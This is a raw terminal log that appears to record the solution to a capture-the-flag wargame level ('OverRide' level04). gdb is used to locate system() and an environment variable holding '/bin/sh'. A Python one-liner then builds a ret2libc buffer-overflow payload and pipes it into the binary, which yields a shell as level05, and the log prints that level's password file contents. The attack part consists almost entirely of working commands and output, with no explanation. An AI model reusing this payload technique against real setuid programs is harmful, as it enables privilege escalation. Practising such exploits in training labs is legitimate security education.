4.0 KiB
level04@OverRide:~$ export EGG=" /bin/sh" level04@OverRide:~$ gdb level04 bGNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04 Copyright (C) 2012 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". For bug reporting instructions, please see: http://bugs.launchpad.net/gdb-linaro/... Reading symbols from /home/users/level04/level04...(no debugging symbols found)...done. (gdb) b main+150 Function "main+150" not defined. Make breakpoint pending on future shared library load? (y or [n]) ^Cn (gdb) Quit (gdb) b *main+150 Breakpoint 1 at 0x804875e (gdb) set follow-fork-mode child (gdb) run Starting program: /home/users/level04/level04 [New process 1813] Give me some shellcode, k [Switching to process 1813]
Breakpoint 1, 0x0804875e in main () (gdb) p system $1 = {<text variable, no debug info>} 0xf7e6aed0 (gdb) p (char *)getenv("EGG") $2 = 0xffffd857 ' ' <repeats 200 times>... (gdb) exit Undefined command: "exit". Try "help". (gdb) quit A debugging session is active.
Inferior 2 [process 1813] will be killed.
Quit anyway? (y or n) y child is exiting... level04@OverRide:~$ env TERM=xterm-256color SHELL=/bin/bash SSH_CLIENT=10.0.2.2 59932 4242 OLDPWD=/home/users/level04 SSH_TTY=/dev/pts/0 EGG= /bin/sh USER=level04 LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:.tar=01;31:.tgz=01;31:.arj=01;31:.taz=01;31:.lzh=01;31:.lzma=01;31:.tlz=01;31:.txz=01;31:.zip=01;31:.z=01;31:.Z=01;31:.dz=01;31:.gz=01;31:.lz=01;31:.xz=01;31:.bz2=01;31:.bz=01;31:.tbz=01;31:.tbz2=01;31:.tz=01;31:.deb=01;31:.rpm=01;31:.jar=01;31:.war=01;31:.ear=01;31:.sar=01;31:.rar=01;31:.ace=01;31:.zoo=01;31:.cpio=01;31:.7z=01;31:.rz=01;31:.jpg=01;35:.jpeg=01;35:.gif=01;35:.bmp=01;35:.pbm=01;35:.pgm=01;35:.ppm=01;35:.tga=01;35:.xbm=01;35:.xpm=01;35:.tif=01;35:.tiff=01;35:.png=01;35:.svg=01;35:.svgz=01;35:.mng=01;35:.pcx=01;35:.mov=01;35:.mpg=01;35:.mpeg=01;35:.m2v=01;35:.mkv=01;35:.webm=01;35:.ogm=01;35:.mp4=01;35:.m4v=01;35:.mp4v=01;35:.vob=01;35:.qt=01;35:.nuv=01;35:.wmv=01;35:.asf=01;35:.rm=01;35:.rmvb=01;35:.flc=01;35:.avi=01;35:.fli=01;35:.flv=01;35:.gl=01;35:.dl=01;35:.xcf=01;35:.xwd=01;35:.yuv=01;35:.cgm=01;35:.emf=01;35:.axv=01;35:.anx=01;35:.ogv=01;35:.ogx=01;35:.aac=00;36:.au=00;36:.flac=00;36:.mid=00;36:.midi=00;36:.mka=00;36:.mp3=00;36:.mpc=00;36:.ogg=00;36:.ra=00;36:.wav=00;36:.axa=00;36:.oga=00;36:.spx=00;36:.xspf=00;36: MAIL=/var/mail/level04 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games PWD=/home/users/level04 LANG=en_US.UTF-8 SHLVL=1 HOME=/home/users/level04 LANGUAGE=en_US:en LOGNAME=level04 SSH_CONNECTION=10.0.2.2 59932 10.0.2.15 4242 LESSOPEN=| /usr/bin/lesspipe %s LESSCLOSE=/usr/bin/lesspipe %s %s _=/usr/bin/env level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > exploit.txt -bash: exploit.txt: Permission denied level04@OverRide:~$ chmod +w . level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > exploit.txt level04@OverRide:~$ cat exploit.txt - | ./level04 Give me some shellcode, k whoami level05 cat /home/users/level05/.pass 3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN